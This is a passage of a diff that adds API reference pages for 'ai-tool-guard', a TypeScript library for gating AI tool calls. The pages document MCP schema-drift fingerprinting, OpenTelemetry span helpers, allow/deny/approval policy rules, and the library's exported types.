`startToolExecutionSpan` | function | Create a span for tool execution | +| `startApprovalSpan` | function | Create a span for approval wait time | +| `ATTR` | constant | Object of 16 semantic attribute key strings | +| `Span` | interface | Minimal span interface | +| `Tracer` | interface | Minimal tracer interface | +| `OtelConfig` | interface | OTel configuration options | + +### MCP (`ai-tool-guard/mcp`) + +| Export | Kind | Description | +|---|---|---| +| `computeFingerprint` | function | SHA-256 fingerprint of a tool schema | +| `pinFingerprint` | function | Create a `McpToolFingerprint` record | +| `detectDrift` | function | Compare current schemas against pinned fingerprints | +| `FingerprintStore` | class | In-memory fingerprint store with JSON import/export | +| `McpToolFingerprint` | interface | Pinned schema fingerprint record | +| `McpDriftResult` | interface | Aggregate drift detection result | +| `McpDriftChange` | interface | Individual changed-tool detail | + +--- + +## Subpages + +- [Core](./core.md) +- [Policy](./policy.md) +- [Approval](./approval.md) +- [Guards](./guards.md) +- [OpenTelemetry](./otel.md) +- [MCP](./mcp.md) +- [All Types](./types.md) diff --git a/docs/api/mcp.md b/docs/api/mcp.md new file mode 100644 index 0000000..40e6035 --- /dev/null +++ b/docs/api/mcp.md @@ -0,0 +1,257 @@ +# MCP — `ai-tool-guard/mcp` + +The MCP module provides tool schema fingerprinting and drift detection for Model +Context Protocol servers. It detects when a remote tool's schema changes between +deployments, which can indicate an inadvertent update or a supply-chain attack. + +```ts +import { + computeFingerprint, + pinFingerprint, + detectDrift, + FingerprintStore, +} from "ai-tool-guard/mcp"; +``` + +--- + +## Functions + +### `computeFingerprint` + +```ts +async function computeFingerprint( + toolName: string, + schema: unknown, +): Promise +``` + +Compute a deterministic SHA-256 fingerprint for a tool's schema. The tool name +and schema are combined and canonicalized (keys sorted recursively) before +hashing, so fingerprints are stable regardless of JSON key order. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Name of the tool | +| `schema` | `unknown` | Yes | The tool's schema object (typically the Zod or JSON Schema definition) | + +**Returns** `Promise` — hex-encoded SHA-256 hash + +--- + +### `pinFingerprint` + +```ts +async function pinFingerprint( + toolName: string, + serverId: string, + schema: unknown, + environment?: string, +): Promise +``` + +Create a `McpToolFingerprint` record by computing the schema hash and capturing +metadata. Store the result in a `FingerprintStore` or a persistent database for +later drift comparison. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Name of the tool to pin | +| `serverId` | `string` | Yes | Identifier of the MCP server serving this tool | +| `schema` | `unknown` | Yes | Current schema to pin | +| `environment` | `string` | No | Environment tag such as `"production"` or `"staging"` | + +**Returns** `Promise` + +**Example** + +```ts +const fp = await pinFingerprint("web_search", "mcp-server-prod", webSearchSchema, "production"); +store.set(fp); +``` + +--- + +### `detectDrift` + +```ts +async function detectDrift( + pinnedFingerprints: McpToolFingerprint[], + currentSchemas: Array<{ + toolName: string; + serverId: string; + schema: unknown; + }>, +): Promise +``` + +Compare a set of current tool schemas against their pinned fingerprints. For each +current schema, the function recomputes the fingerprint and compares it against +the pinned hash. + +Two conditions generate a `McpDriftChange` entry: + +1. The tool is present in `currentSchemas` but absent from `pinnedFingerprints` + (new, unpinned tool). +2. The tool is pinned but its computed hash differs from the stored hash. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `pinnedFingerprints` | `McpToolFingerprint[]` | Yes | Previously pinned fingerprint records | +| `currentSchemas` | `Array<{ toolName: string; serverId: string; schema: unknown }>` | Yes | Current schemas from the live MCP server | + +**Returns** `Promise` + +**Example** + +```ts +const driftResult = await detectDrift(store.getAll(), liveSchemas); + +if (driftResult.drifted) { + for (const change of driftResult.changes) { + console.error(change.remediation); + } +} +``` + +--- + +## Classes + +### `FingerprintStore` + +Simple in-memory reference implementation for storing pinned fingerprints. For +production use, persist the data by calling `export()` and storing the JSON, then +reloading with `import()` on startup. + +#### Constructor + +```ts +new FingerprintStore() +``` + +No parameters. Initializes an empty in-memory map. + +#### Methods + +##### `set` + +```ts +set(fp: McpToolFingerprint): void +``` + +Pin a fingerprint. Overwrites any existing entry for the same `serverId` + +`toolName` combination. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `fp` | `McpToolFingerprint` | Yes | Fingerprint record to store | + +##### `get` + +```ts +get(serverId: string, toolName: string): McpToolFingerprint | undefined +``` + +Retrieve a pinned fingerprint by server and tool name. Returns `undefined` if not +found. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `serverId` | `string` | Yes | MCP server identifier | +| `toolName` | `string` | Yes | Tool name | + +**Returns** `McpToolFingerprint | undefined` + +##### `getAll` + +```ts +getAll(): McpToolFingerprint[] +``` + +Return all pinned fingerprints as an array. Suitable for passing directly to +`detectDrift()`. + +**Returns** `McpToolFingerprint[]` + +##### `delete` + +```ts +delete(serverId: string, toolName: string): boolean +``` + +Remove a pinned fingerprint. Returns `true` if an entry was deleted, `false` if +no matching entry existed. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `serverId` | `string` | Yes | MCP server identifier | +| `toolName` | `string` | Yes | Tool name | + +**Returns** `boolean` + +##### `export` + +```ts +export(): string +``` + +Serialize all fingerprints to a JSON string for persistence. The output is an +array of `McpToolFingerprint` objects formatted with two-space indentation. + +**Returns** `string` + +##### `import` + +```ts +import(json: string): void +``` + +Deserialize fingerprints from a JSON string and add them to the store. Validates +that each entry has `toolName`, `serverId`, `schemaHash`, and `pinnedAt` as +strings. Throws an `Error` if the JSON is invalid or any entry fails validation. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `json` | `string` | Yes | JSON string produced by `export()` | + +--- + +## Interfaces + +### `McpToolFingerprint` + +A pinned schema fingerprint record for a single MCP tool. + +| Field | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Name of the tool | +| `serverId` | `string` | Yes | Identifier of the MCP server | +| `schemaHash` | `string` | Yes | SHA-256 hex hash of the canonicalized schema | +| `pinnedAt` | `string` | Yes | ISO-8601 timestamp of when the fingerprint was created | +| `environment` | `string` | No | Environment tag (e.g. `"production"`, `"staging"`) | + +--- + +### `McpDriftResult` + +Aggregate result of `detectDrift()`. + +| Field | Type | Description | +|---|---|---| +| `drifted` | `boolean` | `true` when at least one tool has changed or is unpinned | +| `changes` | `McpDriftChange[]` | Detailed change records for every drifted or unpinned tool | + +--- + +### `McpDriftChange` + +Detail for a single tool that has drifted or is not pinned. + +| Field | Type | Description | +|---|---|---| +| `toolName` | `string` | Name of the changed tool | +| `serverId` | `string` | MCP server identifier | +| `expectedHash` | `string` | Pinned hash, or `"(not pinned)"` for new tools | +| `actualHash` | `string` | Currently computed hash | +| `remediation` | `string` | Human-readable description of what changed and how to resolve it | diff --git a/docs/api/otel.md b/docs/api/otel.md new file mode 100644 index 0000000..ece8cc0 --- /dev/null +++ b/docs/api/otel.md @@ -0,0 +1,215 @@ +# OpenTelemetry — `ai-tool-guard/otel` + +The OTel module provides tracer creation and pre-built span helpers for the main +guard pipeline stages. It depends on `@opentelemetry/api` as an optional peer +dependency; when the package is not installed, all functions return no-op +implementations that produce zero overhead. + +```ts +import { + createTracer, + spanFromDecision, + startToolExecutionSpan, + startApprovalSpan, + ATTR, +} from "ai-tool-guard/otel"; +import type { Span, Tracer } from "ai-tool-guard/otel"; +``` + +--- + +## Functions + +### `createTracer` + +```ts +function createTracer(config?: OtelConfig): Tracer +``` + +Obtain a tracer instance. If `@opentelemetry/api` is available in the runtime, +returns the real OTel tracer registered under the configured name. Otherwise +returns a no-op tracer. + +The result is cached per tracer name to avoid repeated import attempts. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `config` | `OtelConfig` | No | OTel configuration options | + +**Returns** `Tracer` + +**Example** + +```ts +const tracer = createTracer({ tracerName: "my-app", enabled: true }); +const span = tracer.startSpan("custom.operation"); +span.end(); +``` + +--- + +### `spanFromDecision` + +```ts +function spanFromDecision( + tracer: Tracer, + record: DecisionRecord, + config?: OtelConfig, +): Span +``` + +Create and populate a span for a policy evaluation step. The span name is +`"ai_tool_guard.policy_eval"`. All standard decision attributes are set from the +`DecisionRecord`. If the verdict is `"deny"`, the span status is set to ERROR. + +The caller is responsible for calling `span.end()` when the work is done. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `tracer` | `Tracer` | Yes | Tracer obtained from `createTracer()` | +| `record` | `DecisionRecord` | Yes | Decision record to read attributes from | +| `config` | `OtelConfig` | No | OTel config; `defaultAttributes` are merged into span attributes | + +**Returns** `Span` + +--- + +### `startToolExecutionSpan` + +```ts +function startToolExecutionSpan( + tracer: Tracer, + toolName: string, + config?: OtelConfig, +): Span +``` + +Create a span for the tool execution phase. The span name is +`"ai_tool_guard.tool_execute"`. Sets `ATTR.TOOL_NAME` on the span. + +The caller is responsible for calling `span.end()` (and `span.setStatus()` on +error) when execution completes. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `tracer` | `Tracer` | Yes | Tracer instance | +| `toolName` | `string` | Yes | Name of the tool being executed | +| `config` | `OtelConfig` | No | OTel config; `defaultAttributes` are merged | + +**Returns** `Span` + +--- + +### `startApprovalSpan` + +```ts +function startApprovalSpan( + tracer: Tracer, + toolName: string, + tokenId: string, + config?: OtelConfig, +): Span +``` + +Create a span that measures approval wait time. The span name is +`"ai_tool_guard.approval_wait"`. Sets `ATTR.TOOL_NAME` and +`ATTR.APPROVAL_TOKEN_ID` as initial attributes. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `tracer` | `Tracer` | Yes | Tracer instance | +| `toolName` | `string` | Yes | Name of the tool awaiting approval | +| `tokenId` | `string` | Yes | Approval token ID for correlation | +| `config` | `OtelConfig` | No | OTel config; `defaultAttributes` are merged | + +**Returns** `Span` + +--- + +## Constants + +### `ATTR` + +Object of 16 semantic attribute key strings. Import and use these constants when +setting span attributes to ensure consistent naming across services. + +```ts +import { ATTR } from "ai-tool-guard/otel"; +span.setAttribute(ATTR.DECISION_VERDICT, "deny"); +``` + +| Key | String value | +|---|---| +| `ATTR.TOOL_NAME` | `"ai_tool_guard.tool.name"` | +| `ATTR.TOOL_RISK_LEVEL` | `"ai_tool_guard.tool.risk_level"` | +| `ATTR.TOOL_RISK_CATEGORIES` | `"ai_tool_guard.tool.risk_categories"` | +| `ATTR.DECISION_VERDICT` | `"ai_tool_guard.decision.verdict"` | +| `ATTR.DECISION_REASON` | `"ai_tool_guard.decision.reason"` | +| `ATTR.DECISION_MATCHED_RULES` | `"ai_tool_guard.decision.matched_rules"` | +| `ATTR.DECISION_DRY_RUN` | `"ai_tool_guard.decision.dry_run"` | +| `ATTR.APPROVAL_TOKEN_ID` | `"ai_tool_guard.approval.token_id"` | +| `ATTR.APPROVAL_APPROVED` | `"ai_tool_guard.approval.approved"` | +| `ATTR.APPROVAL_PATCHED` | `"ai_tool_guard.approval.patched"` | +| `ATTR.INJECTION_SCORE` | `"ai_tool_guard.injection.score"` | +| `ATTR.INJECTION_SUSPECTED` | `"ai_tool_guard.injection.suspected"` | +| `ATTR.RATE_LIMIT_ALLOWED` | `"ai_tool_guard.rate_limit.allowed"` | +| `ATTR.OUTPUT_REDACTED` | `"ai_tool_guard.output.redacted"` | +| `ATTR.OUTPUT_BLOCKED` | `"ai_tool_guard.output.blocked"` | +| `ATTR.MCP_DRIFT_DETECTED` | `"ai_tool_guard.mcp.drift_detected"` | + +--- + +## Interfaces + +### `Span` + +Minimal span interface. The real OTel `Span` type satisfies this interface, as +does the no-op implementation used when `@opentelemetry/api` is absent. + +```ts +interface Span { + setAttribute(key: string, value: string | number | boolean): void; + setStatus(status: { code: number; message?: string }): void; + end(): void; +} +``` + +| Method | Description | +|---|---| +| `setAttribute(key, value)` | Set a span attribute. Value must be a primitive. | +| `setStatus({ code, message? })` | Set the span status. Code `2` = ERROR, `1` = OK, `0` = UNSET. | +| `end()` | Finish the span and flush it to the exporter. | + +--- + +### `Tracer` + +Minimal tracer interface used to create spans. + +```ts +interface Tracer { + startSpan( + name: string, + options?: { attributes?: Record }, + ): Span; +} +``` + +| Method | Description | +|---|---| +| `startSpan(name, options?)` | Start a new span with the given name and optional initial attributes. | + +--- + +## Interface + +### `OtelConfig` + +Configuration for the OTel integration, passed to `createTracer()` and span +helpers. + +| Field | Type | Required | Description | +|---|---|---|---| +| `enabled` | `boolean` | No | When `false`, all functions return no-op implementations regardless of whether `@opentelemetry/api` is installed. Default: `true` when OTel API is available | +| `tracerName` | `string` | No | Custom tracer name registered with OTel. Default: `"ai-tool-guard"` | +| `defaultAttributes` | `Record` | No | Additional attributes merged into every span created by span helpers | diff --git a/docs/api/policy.md b/docs/api/policy.md new file mode 100644 index 0000000..e472776 --- /dev/null +++ b/docs/api/policy.md @@ -0,0 +1,287 @@ +# Policy — `ai-tool-guard/policy` + +The policy module provides the rule evaluation engine, ergonomic rule builders, +preset bundles, and a simulation runner for dry-run analysis. + +```ts +import { + evaluatePolicy, + allow, + deny, + requireApproval, + defaultPolicy, + readOnlyPolicy, + simulate, +} from "ai-tool-guard/policy"; +``` + +--- + +## Functions + +### `evaluatePolicy` + +```ts +async function evaluatePolicy( + ctx: PolicyContext, + options: GuardOptions, + toolConfig?: { riskLevel?: RiskLevel; riskCategories?: RiskCategory[] }, +): Promise +``` + +Evaluate a tool call against the configured policy rules and/or external backend. + +**Evaluation order:** + +1. If a `PolicyBackend` is configured, delegate to it first. +2. Evaluate built-in `PolicyRule` entries in descending priority order. +3. Merge results using severity escalation: `deny` > `require-approval` > `allow`. +4. If no rule matches, default to `"allow"`. + +The result is always a full `DecisionRecord` regardless of verdict. + +**Parameters** + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `ctx` | `PolicyContext` | Yes | Tool call context: name, args, user attributes, conversation | +| `options` | `GuardOptions` | Yes | Guard configuration containing rules and/or backend | +| `toolConfig` | `{ riskLevel?: RiskLevel; riskCategories?: RiskCategory[] }` | No | Per-tool risk metadata used when evaluating risk-level-based rules | + +**Returns** `Promise` + +--- + +### `allow` + +```ts +function allow(opts: { + tools: string | string[]; + riskLevels?: RiskLevel[]; + condition?: (ctx: PolicyContext) => boolean | Promise; + description?: string; + priority?: number; +}): PolicyRule +``` + +Create a `PolicyRule` with verdict `"allow"`. + +**Parameters** + +| Field | Type | Required | Description | +|---|---|---|---| +| `tools` | `string \| string[]` | Yes | Tool name glob pattern(s). Use `"*"` for all tools. | +| `riskLevels` | `RiskLevel[]` | No | Restrict to tools with these risk levels | +| `condition` | `(ctx: PolicyContext) => boolean \| Promise` | No | Predicate for attribute-based matching | +| `description` | `string` | No | Human-readable description recorded in the decision | +| `priority` | `number` | No | Higher values are evaluated first. Default: `0` | + +**Returns** `PolicyRule` + +--- + +### `deny` + +```ts +function deny(opts: { + tools: string | string[]; + riskLevels?: RiskLevel[]; + condition?: (ctx: PolicyContext) => boolean | Promise; + description?: string; + priority?: number; +}): PolicyRule +``` + +Create a `PolicyRule` with verdict `"deny"`. Same options shape as `allow()`. + +**Returns** `PolicyRule` + +--- + +### `requireApproval` + +```ts +function requireApproval(opts: { + tools: string | string[]; + riskLevels?: RiskLevel[]; + condition?: (ctx: PolicyContext) => boolean | Promise; + description?: string; + priority?: number; +}): PolicyRule +``` + +Create a `PolicyRule` with verdict `"require-approval"`. Same options shape as +`allow()`. + +**Returns** `PolicyRule` + +--- + +### `defaultPolicy` + +```ts +function defaultPolicy(): PolicyRule[] +``` + +Return a preset rule bundle with three rules: + +- `allow` all tools with `riskLevel: "low"` +- `requireApproval` for tools with `riskLevel: "medium"` +- `deny` tools with `riskLevel: "high"` or `"critical"` + +All three rules use `tools: "*"` and `priority: 0`. + +**Returns** `PolicyRule[]` + +**Example** + +```ts +const guard = createToolGuard({ + rules: defaultPolicy(), + onApprovalRequired: async (token) => handleApproval(token), +}); +``` + +--- + +### `readOnlyPolicy` + +```ts +function readOnlyPolicy(readToolPatterns: string[]): PolicyRule[] +``` + +Return a two-rule bundle that allows a specified set of read-only tools and denies +everything else. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `readToolPatterns` | `string[]` | Yes | Glob patterns for tools that should be allowed | + +**Returns** `PolicyRule[]` — `[allow({ tools: readToolPatterns, priority: 10 }), deny({ tools: "*", priority: 0 })]` + +**Example** + +```ts +const guard = createToolGuard({ + rules: readOnlyPolicy(["db.query", "fs.read*"]), +}); +``` + +--- + +### `simulate` + +```ts +async function simulate( + trace: RecordedToolCall[], + options: GuardOptions, + toolConfigs?: Record, +): Promise +``` + +Run a dry-run policy evaluation over a recorded trace of tool calls. No tools are +executed. Every call produces a `DecisionRecord` with `dryRun: true`. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `trace` | `RecordedToolCall[]` | Yes | Sequence of recorded tool calls to evaluate | +| `options` | `GuardOptions` | Yes | The policy configuration to evaluate against | +| `toolConfigs` | `Record` | No | Per-tool risk metadata for the simulation | + +**Returns** `Promise` + +**Example** + +```ts +const result = await simulate(recordedCalls, { rules: defaultPolicy() }); +console.log(result.summary); +// { total: 10, allowed: 7, denied: 2, requireApproval: 1 } +``` + +--- + +## Interfaces + +### `PolicyRule` + +Atomic unit of the built-in policy engine. + +| Field | Type | Required | Description | +|---|---|---|---| +| `id` | `string` | Yes | Stable identifier used in `DecisionRecord.matchedRules` | +| `description` | `string` | No | Human-readable explanation shown in decision records | +| `toolPatterns` | `string[]` | Yes | Glob patterns matched against `PolicyContext.toolName` | +| `riskLevels` | `RiskLevel[]` | No | If set, rule only matches tools with one of these risk levels | +| `verdict` | `DecisionVerdict` | Yes | Action to take: `"allow"`, `"deny"`, or `"require-approval"` | +| `condition` | `(ctx: PolicyContext) => boolean \| Promise` | No | Optional async predicate; rule skipped when it returns `false` | +| `priority` | `number` | No | Evaluation order; higher = evaluated first. Default: `0` | + +--- + +### `PolicyBackend` + +Adapter interface for delegating decisions to an external policy engine such as +OPA or Cedar. + +```ts +interface PolicyBackend { + name: string; + evaluate(ctx: PolicyContext): Promise; +} +``` + +| Field | Type | Required | Description | +|---|---|---|---| +| `name` | `string` | Yes | Unique name used in logging and tracing | +| `evaluate` | `(ctx: PolicyContext) => Promise` | Yes | Evaluate a tool invocation and return a verdict | + +--- + +### `PolicyBackendResult` + +Result returned by `PolicyBackend.evaluate()`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `verdict` | `DecisionVerdict` | Yes | The verdict from the external engine | +| `reason` | `string` | Yes | Human-readable explanation | +| `matchedRules` | `string[]` | Yes | Rule IDs or names that matched in the external engine | +| `attributes` | `Record` | No | Additional attributes merged into the `DecisionRecord` | + +--- + +### `PolicyContext` + +Context passed into every policy evaluation. + +| Field | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Name of the tool being invoked | +| `args` | `Record` | Yes | Arguments the model wants to pass | +| `userAttributes` | `Record` | Yes | Caller-supplied attributes (user id, roles, tenant, etc.) | +| `conversation` | `ConversationContext` | No | Conversation-level metadata for contextual policies | +| `dryRun` | `boolean` | No | When `true`, the engine is in simulation mode | + +--- + +### `RecordedToolCall` + +A captured tool call used as input to `simulate()`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Name of the tool | +| `args` | `Record` | Yes | Arguments of the call | +| `userAttributes` | `Record` | No | User attribute overrides for this simulation entry | + +--- + +### `SimulationResult` + +Aggregate output of `simulate()`. + +| Field | Type | Description | +|---|---|---| +| `decisions` | `DecisionRecord[]` | All decision records produced, one per recorded call | +| `summary` | `{ total: number; allowed: number; denied: number; requireApproval: number }` | Counts by verdict | +| `blocked` | `Array<{ toolCall: RecordedToolCall; decision: DecisionRecord }>` | Calls that would have been denied or required approval | diff --git a/docs/api/types.md b/docs/api/types.md new file mode 100644 index 0000000..8a9250b --- /dev/null +++ b/docs/api/types.md @@ -0,0 +1,438 @@ +# All Types — `ai-tool-guard` + +This page documents every exported type and interface from `src/types.ts`, +organized by domain. All of these are re-exported from the root `ai-tool-guard` +path. + +```ts +import type { + RiskLevel, + RiskCategory, + DecisionVerdict, + DecisionRecord, + PolicyContext, + ConversationContext, + PolicyRule, + PolicyBackend, + PolicyBackendResult, + ToolGuardConfig, + ArgGuard, + ZodArgGuard, + OutputFilterVerdict, + OutputFilter, + OutputFilterResult, + ApprovalToken, + ApprovalResolution, + ApprovalHandler, + RateLimitConfig, + RateLimitState, + InjectionDetectorConfig, + McpToolFingerprint, + McpDriftResult, + McpDriftChange, + OtelConfig, + GuardOptions, +} from "ai-tool-guard"; +``` + +--- + +## Risk + +### `RiskLevel` + +```ts +type RiskLevel = "low" | "medium" | "high" | "critical"; +``` + +Assigned to tools or tool calls to indicate their potential impact. Used by +built-in policy rules to match calls and by `DecisionRecord` for audit. + +| Value | Typical use | +|---|---| +| `"low"` | Read-only, idempotent, no side effects | +| `"medium"` | Writes to non-critical data, reversible | +| `"high"` | Irreversible writes, sensitive data access | +| `"critical"` | Payments, authentication, mass data operations | + +--- + +### `RiskCategory` + +```ts +type RiskCategory = + | "data-read" + | "data-write" + | "data-delete" + | "network" + | "filesystem" + | "authentication" + | "payment" + | "pii" + | "custom"; +``` + +Human-readable classification tags attached to tools for audit trails and +policy targeting. Multiple categories can be combined on a single tool. + +--- + +## Decision + +### `DecisionVerdict` + +```ts +type DecisionVerdict = "allow" | "deny" | "require-approval"; +``` + +The outcome of a policy evaluation. + +| Value | Meaning | +|---|---| +| `"allow"` | The tool call may proceed | +| `"deny"` | The tool call is blocked; `ToolGuardError` with code `"policy-denied"` is thrown | +| `"require-approval"` | The call is paused pending human approval | + +--- + +### `DecisionRecord` + +Structured record produced for every policy evaluation. Emitted to +`GuardOptions.onDecision` and attached to `ToolGuardError.decision`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `id` | `string` | Yes | Unique correlation ID (generated per evaluation) | +| `timestamp` | `string` | Yes | ISO-8601 timestamp of when the decision was made | +| `verdict` | `DecisionVerdict` | Yes | Final verdict | +| `toolName` | `string` | Yes | Name of the tool under evaluation | +| `matchedRules` | `string[]` | Yes | IDs of all policy rules that matched | +| `riskLevel` | `RiskLevel` | Yes | Effective risk level of the tool | +| `riskCategories` | `RiskCategory[]` | Yes | Risk categories that applied | +| `attributes` | `Record` | Yes | Merged user and backend attributes consumed during evaluation | +| `reason` | `string` | Yes | Human-readable explanation of the verdict | +| `redactions` | `string[]` | No | Fields that were redacted in the output, if any | +| `evalDurationMs` | `number` | Yes | Time spent in policy evaluation in milliseconds | +| `dryRun` | `boolean` | Yes | Whether this was a simulation (dry-run) evaluation | + +--- + +## Policy + +### `PolicyContext` + +Context passed into every policy evaluation. Constructed by `ToolGuard` for each +tool invocation. + +| Field | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Name of the tool being invoked | +| `args` | `Record` | Yes | Arguments the model wants to pass | +| `userAttributes` | `Record` | Yes | Caller-supplied attributes resolved by `GuardOptions.resolveUserAttributes` | +| `conversation` | `ConversationContext` | No | Conversation-level metadata resolved by `GuardOptions.resolveConversationContext` | +| `dryRun` | `boolean` | No | When `true`, the engine is in simulation mode and tools are not executed | + +--- + +### `ConversationContext` + +Conversation-level metadata available to context-aware policies. Useful for +detecting escalating risk within a session (e.g., repeated failures, recent +approvals). + +| Field | Type | Required | Description | +|---|---|---|---| +| `sessionId` | `string` | No | Unique conversation or session identifier | +| `riskScore` | `number` | No | Cumulative risk score for the conversation | +| `priorFailures` | `number` | No | Count of prior tool failures in this conversation | +| `recentApprovals` | `string[]` | No | Tool names approved earlier in this conversation | +| `metadata` | `Record` | No | Arbitrary key-value bag for application-specific state | + +--- + +### `PolicyRule` + +Atomic unit of the built-in policy engine. For external DSL backends use +`PolicyBackend` instead. + +| Field | Type | Required | Description | +|---|---|---|---| +| `id` | `string` | Yes | Stable identifier used in `DecisionRecord.matchedRules` | +| `description` | `string` | No | Human-readable description recorded in the decision reason | +| `toolPatterns` | `string[]` | Yes | Glob patterns matched against `PolicyContext.toolName` (e.g. `"db.*"`, `"*"`) | +| `riskLevels` | `RiskLevel[]` | No | When set, the rule only matches tools whose effective risk level is in this list | +| `verdict` | `DecisionVerdict` | Yes | Action to take when this rule matches | +| `condition` | `(ctx: PolicyContext) => boolean \| Promise` | No | Optional async predicate; the rule is skipped when it returns `false` | +| `priority` | `number` | No | Evaluation order: higher values are evaluated first. Default: `0` | + +--- + +### `PolicyBackend` + +Adapter interface for delegating policy decisions to an external engine such as +OPA (Open Policy Agent) or Cedar. + +| Field | Type | Required | Description | +|---|---|---|---| +| `name` | `string` | Yes | Unique backend name used in logging and tracing | +| `evaluate` | `(ctx: PolicyContext) => Promise` | Yes | Evaluate a tool invocation and return a verdict with explanation | + +--- + +### `PolicyBackendResult` + +The result returned by `PolicyBackend.evaluate()`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `verdict` | `DecisionVerdict` | Yes | The verdict from the external engine | +| `reason` | `string` | Yes | Human-readable explanation of the verdict | +| `matchedRules` | `string[]` | Yes | Rule IDs or names that matched within the external engine | +| `attributes` | `Record` | No | Additional metadata merged into `DecisionRecord.attributes` | + +--- + +## Tools + +### `ToolGuardConfig` + +Per-tool metadata attached via `ToolGuard.guardTool()` or `ToolGuard.guardTools()`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `riskLevel` | `RiskLevel` | No | Risk level of this tool | +| `riskCategories` | `RiskCategory[]` | No | Classification tags for audit and explainability | +| `rateLimit` | `RateLimitConfig` | No | Per-tool rate limit (overrides `GuardOptions.defaultRateLimit`) | +| `maxConcurrency` | `number` | No | Per-tool concurrency cap (overrides `GuardOptions.defaultMaxConcurrency`) | +| `argGuards` | `ArgGuard[]` | No | Argument-level validators run before policy evaluation | +| `outputFilters` | `OutputFilter[]` | No | Output filters applied after tool execution | +| `requireApproval` | `boolean` | No | When `true`, forces approval even if the policy verdict is `"allow"` | +| `mcpFingerprint` | `string` | No | Expected schema hash; execution is blocked when the computed hash differs | + +--- + +## Guards + +### `ArgGuard` + +Interface for argument-level validators. Each guard targets a single field (or +all fields via `"*"`) and returns a failure message or `null`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `field` | `string` | Yes | Dot-path to the target argument field (e.g. `"user.email"`) or `"*"` for the whole args object | +| `validate` | `(value: unknown, ctx: PolicyContext) => string \| null \| Promise` | Yes | Validation function; return a string to deny with that reason, or `null` to pass | + +--- + +### `ZodArgGuard` + +Convenience shape for creating an `ArgGuard` backed by a Zod schema. Pass to +`zodGuard()` to produce an `ArgGuard`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `field` | `string` | Yes | Dot-path to the target argument field | +| `schema` | `z.ZodType` | Yes | Zod schema to validate the field value against | + +--- + +## Output + +### `OutputFilterVerdict` + +```ts +type OutputFilterVerdict = "pass" | "redact" | "block"; +``` + +Verdict returned by an `OutputFilter`. + +| Value | Meaning | +|---|---| +| `"pass"` | Output is unchanged and safe to return | +| `"redact"` | Output has been modified (sensitive fields replaced) | +| `"block"` | Output must be suppressed entirely; `ToolGuardError` with code `"output-blocked"` is thrown | + +--- + +### `OutputFilter` + +Interface for output egress controls. Filters run sequentially after tool +execution and before the result is returned to the AI model. + +| Field | Type | Required | Description | +|---|---|---|---| +| `name` | `string` | Yes | Identifier used in logging and `OutputFilterChainResult.blockedBy` | +| `filter` | `(result: unknown, ctx: PolicyContext) => Promise` | Yes | Inspect or transform the tool result | + +--- + +### `OutputFilterResult` + +Returned by `OutputFilter.filter()`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `verdict` | `OutputFilterVerdict` | Yes | Outcome: `"pass"`, `"redact"`, or `"block"` | +| `output` | `unknown` | Yes | The (possibly transformed) output to pass to the next filter or return | +| `redactedFields` | `string[]` | No | Names of fields that were redacted (recorded in the decision) | + +--- + +## Approval + +### `ApprovalToken` + +Correlation token created by `ApprovalManager` and sent to the `ApprovalHandler`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `id` | `string` | Yes | Randomly generated unique token ID | +| `payloadHash` | `string` | Yes | SHA-256 hash of the canonical `{ toolName, args }` payload for tamper detection | +| `toolName` | `string` | Yes | Name of the tool awaiting approval | +| `originalArgs` | `Record` | Yes | Deep clone of the tool arguments at request time | +| `createdAt` | `string` | Yes | ISO-8601 timestamp of token creation | +| `ttlMs` | `number` | No | Token TTL in milliseconds; token is invalid if `elapsed > ttlMs` | + +--- + +### `ApprovalResolution` + +The response returned by the `ApprovalHandler` to `ApprovalManager`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `approved` | `boolean` | Yes | Whether the tool call is approved | +| `patchedArgs` | `Record` | No | Partial argument overrides; merged with `originalArgs` when provided ("approve with edits") | +| `approvedBy` | `string` | No | Identity of the approver for audit records | +| `reason` | `string` | No | Human-readable reason for denial when `approved` is `false` | + +--- + +### `ApprovalHandler` + +```ts +type ApprovalHandler = (token: ApprovalToken) => Promise; +``` + +Callback type the consumer implements. Receives an `ApprovalToken` representing +the pending tool call, presents it to a human or automated approver, and resolves +with the decision. + +--- + +## Rate Limiting + +### `RateLimitConfig` + +Configuration for per-tool rate limiting. + +| Field | Type | Required | Description | +|---|---|---|---| +| `maxCalls` | `number` | Yes | Maximum calls allowed within the window | +| `windowMs` | `number` | Yes | Sliding window duration in milliseconds | +| `strategy` | `"reject" \| "queue"` | No | Backpressure strategy when limit is hit. `"reject"` returns immediately; `"queue"` blocks until a slot is available. Default: `"reject"` | + +--- + +### `RateLimitState` + +Internal sliding-window state maintained by `RateLimiter` for each tool. + +| Field | Type | Description | +|---|---|---| +| `timestamps` | `number[]` | Unix timestamps (ms) of recent call acquisitions within the current window | +| `activeCalls` | `number` | Current count of in-flight calls for concurrency tracking | + +--- + +## Injection + +### `InjectionDetectorConfig` + +Configuration for prompt injection detection. + +| Field | Type | Required | Description | +|---|---|---|---| +| `threshold` | `number` | No | Suspicion score at or above which a call is flagged. Range 0–1. Default: `0.5` | +| `action` | `"downgrade" \| "deny" \| "log"` | No | Action taken when 